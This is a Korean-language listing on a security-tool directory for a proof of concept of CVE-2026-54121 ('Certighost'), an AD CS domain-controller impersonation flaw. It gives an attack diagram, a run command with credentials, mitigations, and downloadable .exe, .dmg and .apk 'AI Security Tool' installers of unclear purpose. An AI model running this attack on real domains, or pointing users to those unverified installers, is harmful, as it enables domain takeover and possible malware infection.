Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-54121-Certighost — CVE-2026-54121(Certighost)에 대한 개념 증명 모듈로, 악성 LDAP/SMB 리스너를 통해 AD CS 등록 검증을 악용하여 도메인 컨트롤러를 사칭하고 PKINIT를 통해 권한을 상승시킵니다. | Kitploit
도구/GitHubGitHub/zerodayevil/cve-2026-54121-certighost
Privilege EscalationVulnerability AnalysisExploitationImpersonation ToolsPost-ExploitationPenetration TestingAuthenticationPapers & ResearchRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubzerodayevil/cve-2026-54121-certighost

CVE-2026-54121-Certighost

CVE-2026-54121(Certighost)에 대한 개념 증명 모듈로, 악성 LDAP/SMB 리스너를 통해 AD CS 등록 검증을 악용하여 도메인 컨트롤러를 사칭하고 PKINIT를 통해 권한을 상승시킵니다.

저장소 보기
13시간 43분 전아직 검토되지 않음

🛡 AI Security Tool 모듈
CVE-2026-54121: Active Directory Certificate Services 가장(Impersonation) (Certighost)

AI Security Tool 생태계를 위한 공식 보안 감사 모듈


Latest Release Build Status Donations Telegram Channel License

🌐 웹 데모 • 📚 프로젝트 웹사이트 • 💬 커뮤니티 채팅

웹사이트 내비게이션: 홈 • 업데이트 • 다운로드 • 모듈

AI Security Tool Banner


🧠 개념 개요

이 모듈은 Certighost라고 명명된 CVE-2026-54121에 대한 진단 기능을 제공합니다. 이 취약점은 컴퓨터 계정 인증서 등록의 검증 단계에서 Active Directory Certificate Services(AD CS) 내에 존재합니다.

표준 저권한 도메인 자격 증명을 보유한 공격자는 새 컴퓨터 계정을 생성하고 조작된 cdc(제어된 IP 리스너) 및 rmd(대상 DC FQDN) 속성을 포함하는 인증서 요청을 제출합니다. 인증 기관(CA)이 머신의 신원을 검증하기 위해 다시 연결하면, 악성 LDAP(포트 389) 및 SMB/LSA(포트 445) 리스너가 대상 도메인 컨트롤러의 신원 속성(sAMAccountName, SID, dNSHostName)을 스푸핑합니다. 이로 인해 CA가 정품 도메인 컨트롤러 인증서를 발급하도록 속여 PKINIT를 통한 전체 도메인 장악을 가능하게 합니다.

🎯 핵심 영향 철학

"머신으로 인증하고, 전체 도메인으로 권한 상승하라."
Certighost는 CA의 신원 확인 파이프라인을 오염시켜 기존 AD CS 템플릿 권한을 우회합니다. 유효한 도메인 컨트롤러 인증서를 획득하면 즉각적인 PKINIT 인증이 부여되어 TGT 자격 증명 캐시(.ccache)와 대상 DC의 NT 해시를 모두 얻을 수 있습니다.

📊 취약점 사양

🕸 공격 시나리오 및 아키텍처

root@kitploit:~
graph TD
    A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
    A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
    A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
    D -->|4. CA Lookups Connect to Rogue Listeners| C
    C -->|5. Validate via Netlogon & Return Target DC Identity| D
    D -->|6. Issue Valid DC Certificate .pfx| A
    A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]

🛡 완화 체크리스트

  • 🟢 보안 업데이트 적용: AD CS 서버 전반에 CVE-2026-54121을 해결하는 공식 Microsoft 패치를 배포하십시오.
  • 🟢 머신 계정 생성 제한: ms-DS-MachineAccountQuota를 0으로 설정하여 비관리자 사용자가 새 컴퓨터 개체를 생성하지 못하도록 하십시오.
  • 🟡 AD CS 강화: 취약한 인증서 템플릿을 비활성화하고 명시적으로 요구되지 않는 한 EDITF_ATTRIBUTESUBJECTALTNAME2(ESC6)가 꺼져 있는지 확인하십시오.
  • 🟡 네트워크 필터링: CA 서버에서 임의의 워크스테이션으로 향하는 아웃바운드 SMB(445) 및 LDAP(389) 트래픽을 차단하십시오.

💻 이 모듈을 실행하는 방법

⚠️ 중요: 이 모듈은 AI Security Tool 프레임워크 내에서 안전한 진단 테스트를 위해 설계되었습니다. 상승된 관리자 권한으로 승인된 대상에 대해서만 실행하십시오.

1️⃣ AI Security Tool 설치

진단 및 모니터링 스크립트를 실행하려면 핵심 AI Security Tool 프레임워크를 설치하십시오:

2️⃣ 종속성 설치 및 실행

악성 LDAP/SMB 리스너 및 인증서 처리를 위한 필수 Python 라이브러리를 설치하십시오:

root@kitploit:~
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython

# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10

🔍 보안 감사 모듈 및 PoC 저장소

커뮤니티에서 유지 관리하는 취약점 스캐너 모듈, PoC 스크립트 및 연구 저장소:

🔥 원격 코드 실행 (RCE) 및 네트워크 취약점 4 modules
  • CVE-2026-41089 — Netlogon 원격 코드 실행 익스플로잇 @ZeroDayEvil
  • CVE-2026-20805 — Windows 원격 코드 실행 개념 증명 @ZeroDayEvil
  • CVE-2026-41096 — 치명적 RCE 취약점 스캐너 모듈 @ZeroDayEvil
  • CVE-2026-24291 — 네트워크 프로토콜 원격 코드 실행 @ZeroDayVPN
🛡 권한 상승 (EoP) 및 서비스 3 modules
  • CVE-2026-54121 — AD CS Certighost 도메인 컨트롤러 가장(Impersonation) @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice 서비스 권한 상승 @ZeroDayVPN
  • CVE-2026-50416 — 로컬 권한 상승 분석 및 PoC @ZeroDayEvil
📚 취약점 연구 및 분석 2 modules
  • CVE-2026-42978 — 심층 기술 분석 및 PoC 연구 @ZeroDayEvil
  • CVE-2026-83991 — 전체 분석 및 익스플로잇 시연 @ZeroDayVPN

⚖️ 라이선스 및 법적 고지

🚨 고지

이 도구와 보안 분석은 승인된 시스템 감사, 방어적 연구 및 침투 테스트 업무를 위해서만 제공됩니다.
시스템 소유자의 명시적인 서면 허가 없이 도메인 환경에 대해 CVE-2026-54121을 실행하는 것은 불법입니다. 저자는 무단 도메인 장악, 데이터 손실 또는 시스템 중단에 대해 어떠한 책임도 지지 않습니다.

🔄 기여 및 커뮤니티

보안 연구 커뮤니티의 기여를 환영합니다! 주요 기여 분야:

  1. AI 통합: 새로운 LLM 제공자 추가 및 특화된 보안 에이전트 개발.
  2. 보안 도구: 취약점 모듈 개발 및 CLI 스캐너 통합.
  3. 최적화: 파서 속도, 실행 안전성 및 캐싱 로직 향상.
  4. 문서화: 연구 논문, 가이드 및 현지화 번역 작성.

🔗 연락처 및 지원

  • 공식 웹사이트: ZeroDayEvil.com
  • 기술 분석: H0j3n의 Gist 분석
  • MSRC 권고: CVE-2026-54121 가이드
  • Telegram 관리자: @ZeroDayEvil
  • Telegram 채팅: @ZeroDyaTool_chat
  • Telegram 채널: @ZeroDyaTool_channel
  • 프로젝트 후원: PayPal 기부
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — 사이버 보안 전문가를 위한 터미널 워크플로우와 자동화를 재구상합니다.

도구 다운로드
사양할당된 값비고
CVE 식별자CVE-2026-54121Active Directory Certificate Services 가장(Impersonation)
심각도 등급치명적 (CVSS v3.1: 9.8)CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
취약점 유형CWE-287 / CWE-290부적절한 인증 / 스푸핑을 통한 인증 우회
영향받는 구성 요소Active Directory Certificate Services (AD CS)인증서 등록 및 신원 검증 파이프라인
공격 벡터네트워크SMB, LDAP, RPC 프로토콜을 통해 원격으로 실행됨
필요 권한낮은 권한표준 도메인 사용자 계정(머신 계정 추가 가능)
OS / 플랫폼버전아키텍처 / 형식출시일상태다운로드 링크
🪟 Windowsv6.3.20x64 설치 프로그램 (.exe)2026-09-08🟢 최신.exe 다운로드
🪟 Windowsv6.3.20x64 포터블 (.tar.gz)2026-09-08🟢 최신.tar.gz 다운로드
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 안정.dmg 다운로드
🐧 Linuxv5.3.27범용 x64 (.tar.gz)2026-09-01🟢 안정.tar.gz 다운로드
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 안정.apk 다운로드